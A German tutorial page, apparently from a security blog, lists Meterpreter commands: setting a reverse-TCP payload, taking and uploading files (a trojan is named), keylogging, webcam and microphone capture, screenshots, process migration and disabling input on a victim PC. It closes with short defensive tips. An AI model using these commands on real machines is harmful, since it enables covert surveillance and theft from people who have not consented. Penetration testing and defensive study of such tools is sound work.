Meterpreter – Wichtige Befehle

Meterpreter ist unserer Meinung nach einer der besten Payloads die es gibt.

Mit Meterpreter lässt sich auf dem „Opfer“ PC ziemlich viel anstellen, zu den Befehlen später mehr. Meterpreter haben wir in unserem „Java Signed Applet“ Tutorial schon einmal gezeigt. Meterpreter setzen Sie mit folgendem Befehl ein:

use payload/windows/meterpreter/reverse_tcp“.

Die wichtigsten Befehle:

Download

Mit Download können Sie eine beliebige Datei von Ihrem Ziel herunterladen.

edit

Mit edit können Sie eine beliebige Datei editieren.

ls

Mit diesem Befehl listen Sie alle Dateien auf.

search

So suchen Sie nach einer bestimmten Datei.

upload

Sie laden eine bestimmte Datei (Trojaner) in das aktuelle Verzeichnis hoch.

ipconfig

Zeigt die Netzwerkeinstellungen von Windows Rechnern

getpid

Zeigt Ihnen an in welchem Prozess Meterpreter aktiv st.

getuid

Zeigt mit welchem Benutzer Sie angmeldet sind.

kill

Dieser Befehl „Tötet“ einen Prozess vom Ziel System.

ps

Zeigt alle aktiven Prozesse an.

reboot

Starten den Ziel PC neu.

shutdown

Fährt den Ziel PC herunter.

shell

Öffnet die Eingabeaufforderung.

sysinfo

Zeigt Systeminformationen an.

keyscan_start

Starten den Keylogger.

keyscan_stop

Stopt den Keylogger.

screenshot

Macht einen Screenshot vom Ziel Rechner.

record_mic

Zeichnet Ton vom Headset bzw. Mikrofon auf.

webcam_list

Zeigt alle Webcams an.

webcam_snap

Macht ein Bild von einer ausgewählen Webcam.

pwd

Zeigt das aktuelle Verzeichnis am angegriffenen System an.

use

Einbindung weiterer Module in eine aktiven Meterpreter-Session.

migrate

Einer der wichtigsten Befehle von Meterpreter. Wenn Sie migrate einsetzten wird der aktuelle Meterpreter Prozess in einen Systemprozess „migriert“. Ein Tutorial dazu folgt noch extra.

uictl

Deaktiviert die Maus und/oder Tastatur.

Es gibt natürlich noch mehr Befehle, alle Befehle rufen Sie über den Befehl „help“ ab.

Fazit:

Sie sehen also, Meterpreter ist ein mächtiges Tool. Sowieso mit der Modulerweiterung sind praktisch keine Grenzen gesetzt. Ein Gegenmittel gibt es dagegen gezielt nicht. Es zählt wie bei jeder Schwachstelle:

  • Programme immer aktuell haben die Verbindung zum Internet haben
  • Aufpassen auf welchen Seiten man sich bewegt
  • Nicht jede Datei runterladen die man findet. Ganz zu schweigen von Cracks von Programmen
  • Hardware Firewall richtig konfiguriert.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.